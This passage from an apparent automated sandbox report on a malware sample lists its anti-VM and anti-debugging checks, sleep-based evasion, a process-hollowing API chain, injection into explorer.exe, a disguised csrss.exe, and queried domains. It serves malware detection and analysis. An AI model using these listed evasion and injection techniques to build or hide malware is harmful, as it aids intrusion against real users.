                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 4600; Thread sleep count: 1299 > 30
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 4600; Thread sleep time: -2598000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 1100; Thread sleep count: 81 > 30
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 1100; Thread sleep time: -4860000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316; Thread sleep count: 1674 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412; Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4920; Thread sleep count: 197 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608; Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exe TID: 2092; Thread sleep time: -31000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe; File opened: PHYSICALDRIVE0
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\ProgramData\Drivers\csrss.exe; Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe; Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe; Thread delayed: delay time: 60000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                  Source: explorer.exe, 00000002.00000000.1534171256.000000000888E000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008979000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMware SATA CD00`
                  Source: 8837.exe, 00000008.00000003.2766763837.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2783359206.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2711800813.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2755427308.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2775292273.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746254584.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2789426353.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2709104940.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2734689175.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2709682388.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2724108825.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >7:qEmu|Z
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: NXTVMWare
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                  Source: 8837.exe, 00000008.00000003.2745920242.00000000038F3000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2747214127.000000000391C000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746593889.000000000390B000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746468325.00000000038FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mul7QhDFSJEjM8DaO4SwI-ef2OfwOJL5vq8OT/r5zKqY6BnOih8n6RHV3ZfJwJfjM-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eg+LEmXl8ieWU+336DqP/G0/8aJ4zS7lkTqqfuwJ7og-eh/165pCOo9Rhqna/NPgoXgzqj1FPwZFmVPBdWaJg+w-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-ei6v5MMmuEx0YBS+/J+jG6V+KKsPjGmn+X5x+fQfzdU-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-emraI0H5XJqmiAQ6lD4p4rTufnIAsfMSLazx7QuoTyg-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-epTTn/6KHUYLECHzT4y7FA2juD9oLGYeacjUB35OU6g-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eru21/QrtGoXe16ofT2RDGg1mQ+vYl6J4T2fvMPc1Us-eru6dA/tRLLS/zjwULnVGn0QPbRK+dwYQa/vor9jQAc-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmG
yo-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e31u7SMky76ygmxEdWNk3HKxXIe1MBVjBqJqcWbMINw-e35/gDdiLRBRq31STbKcaMSKEnZ/LSNZPszXJiJMNqI-e4S8yi3qv3XuBn9t7ylX9JURiMC+r4VGcP0lO+AziXU-e4lVeMdc+CDfWP9aiVzXesicc9cJh93y1hTHHgvoJE8-e41BLZM1I3EgKaVT/OsuJERvNynwmTSfueq9IFb7jpQ-e5fo3c8VekzioPQKgD7vmnPUnDw4mwb3nAIvtv57sac-e5vDZKUWW2rugfRJEbCQx/zHAnfHAHsTqOw7NyrETwk-e6xM+zKnDwa/LtcntndALfB059oFwmv14L6gHnz/WRo-e6xjm5GgYDUS12PmlN8nzBMqpJzVvXMSZEQ3vlZ/2SU-e7QmqCiQghaccS0dAmUTIi7xqHpkFpGm+r1Y0bAKvHo-e7zIKEIU6THMGFZUWnZ3GzgZqvJDpi+qlHo2iiHcmgM-e8KgVMp1MLu5JYLOOlmJPLPnFlPb+xHm4BxVyMRx3g0-e81DiL1CfSZFrsb5ttv9jvDnwdhfC2h7qQqbLw9oqso-e8/UpPXnvMMFV4i3u/DtDiVwoiltkL3/bhApG80zHig-e+ahS69dNNL+OMZfTrOWOlYSPk75s7J4odyOxicarbs-e+ko3ra6wpp9qkplg8J5GNxRF4UtxiIB0EDm5g5tXy0-e/tvZBkYAJGf2lnFlbtJjq1OiDc9TxvWO4yBUJD3PIM-fA0brBRDWMycEsC36RU43T3w7qpfpjdSgnAH45IOJ8A-fBDwqJaaE06Q7A6gzdDGAGW3tUVxUkpXR4/iEwNpvnM-fB7eo59mpkT8dehLT7HG92tXS0OdubBbleYOsDN8QBA-fB8V5fgDuQOuiv0x0G7Xe35ShykDwJJezOY0lrUF0Mc-fCXABMNA2yf0nn7G4lQMHhJ+du1vXSPCzh/I2Ku3F3o-fCj9FbMUOiNzz/Db1SiN3zEshPd7ue
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp, 8E91.exe, 00000009.00000002.1991101064.00000000010F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@g6O
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
                  Source: 8837.exe, 00000008.00000003.2697487110.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2702403229.0000000003840000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: m egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: 8837.exe, 00000008.00000003.2745920242.00000000038F3000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2747214127.000000000391C000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746593889.000000000390B000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746468325.00000000038FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ul7QhDFSJEjM8DaO4SwI-ef2OfwOJL5vq8OT/r5zKqY6BnOih8n6RHV3ZfJwJfjM-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eg+LEmXl8ieWU+336DqP/G0/8aJ4zS7lkTqqfuwJ7og-eh/165pCOo9Rhqna/NPgoXgzqj1FPwZFmVPBdWaJg+w-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-ei6v5MMmuEx0YBS+/J+jG6V+KKsPjGmn+X5x+fQfzdU-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-emraI0H5XJqmiAQ6lD4p4rTufnIAsfMSLazx7QuoTyg-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-epTTn/6KHUYLECHzT4y7FA2juD9oLGYeacjUB35OU6g-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eru21/QrtGoXe16ofT2RDGg1mQ+vYl6J4T2fvMPc1Us-eru6dA/tRLLS/zjwULnVGn0QPbRK+dwYQa/vor9jQAc-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmGy
o-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e31u7SMky76ygmxEdWNk3HKxXIe1MBVjBqJqcWbMINw-e35/gDdiLRBRq31STbKcaMSKEnZ/LSNZPszXJiJMNqI-e4S8yi3qv3XuBn9t7ylX9JURiMC+r4VGcP0lO+AziXU-e4lVeMdc+CDfWP9aiVzXesicc9cJh93y1hTHHgvoJE8-e41BLZM1I3EgKaVT/OsuJERvNynwmTSfueq9IFb7jpQ-e5fo3c8VekzioPQKgD7vmnPUnDw4mwb3nAIvtv57sac-e5vDZKUWW2rugfRJEbCQx/zHAnfHAHsTqOw7NyrETwk-e6xM+zKnDwa/LtcntndALfB059oFwmv14L6gHnz/WRo-e6xjm5GgYDUS12PmlN8nzBMqpJzVvXMSZEQ3vlZ/2SU-e7QmqCiQghaccS0dAmUTIi7xqHpkFpGm+r1Y0bAKvHo-e7zIKEIU6THMGFZUWnZ3GzgZqvJDpi+qlHo2iiHcmgM-e8KgVMp1MLu5JYLOOlmJPLPnFlPb+xHm4BxVyMRx3g0-e81DiL1CfSZFrsb5ttv9jvDnwdhfC2h7qQqbLw9oqso-e8/UpPXnvMMFV4i3u/DtDiVwoiltkL3/bhApG80zHig-e+ahS69dNNL+OMZfTrOWOlYSPk75s7J4odyOxicarbs-e+ko3ra6wpp9qkplg8J5GNxRF4UtxiIB0EDm5g5tXy0-e/tvZBkYAJGf2lnFlbtJjq1OiDc9TxvWO4yBUJD3PIM-fA0brBRDWMycEsC36RU43T3w7qpfpjdSgnAH45IOJ8A-fBDwqJaaE06Q7A6gzdDGAGW3tUVxUkpXR4/iEwNpvnM-fB7eo59mpkT8dehLT7HG92tXS0OdubBbleYOsDN8QBA-fB8V5fgDuQOuiv0x0G7Xe35ShykDwJJezOY0lrUF0Mc-fCXABMNA2yf0nn7G4lQMHhJ+du1vXSPCzh/I2Ku3F3o-fCj9FbMUOiNzz/Db1SiN3zEshPd7uea
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 8837.exe, 00000008.00000003.2943071340.000000000347A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCQ+Mgq8T7UeC/2woYMrFlxjDMFr68VrX2WjJ7YjnLbHGfSDEn0XiQNjKrjsFj8m
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | API call chain: ExitProcess graph end node (graph_7-11570)
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | API call chain: ExitProcess graph end node (graph_16-4393)
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | System information queried: ModuleInformation
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | System information queried: CodeIntegrityInformation
                  Source: C:\Users\user\AppData\Roaming\afratej | System information queried: CodeIntegrityInformation
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exe | System information queried: CodeIntegrityInformation
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\afratej | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004165C0 LoadLibraryW,GetProcAddress,VirtualProtect
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004F092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004F0D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0052BC29 push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_006C092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0072C141 push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_0233D0A3 push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_02500042 push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_0040AEA4 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_00407D21 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_00407D21 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_0040AEA4 mov eax, dword ptr fs:[00000030h]
                  Source: C:\ProgramData\Drivers\csrss.exe | Code function: 24_2_02800083 push dword ptr fs:[00000030h]
                  Source: C:\ProgramData\Drivers\csrss.exe | Code function: 24_2_02A00042 push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_005CBB00 GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_00403309 SetUnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_00402F85 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\explorer.exe | File created: 93D2.exe.2.dr
                  Source: C:\Windows\explorer.exe | Domain query: my.account.sony.com
                  Source: C:\Windows\explorer.exe | Domain query: winoui.com
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_02500110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Thread created: C:\Windows\explorer.exe EIP: B291A88
                  Source: C:\Users\user\AppData\Roaming\afratej | Thread created: unknown EIP: 8A51A88
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exe | Thread created: unknown EIP: AA119F0
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Memory written: C:\Users\user\AppData\Local\Temp\8837.exe base: 400000 value starts with: 4D5A
                  Source: C:\ProgramData\Drivers\csrss.exe | Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Roaming\afratej | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Roaming\afratej | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Process created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                  Source: C:\ProgramData\Drivers\csrss.exe | Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
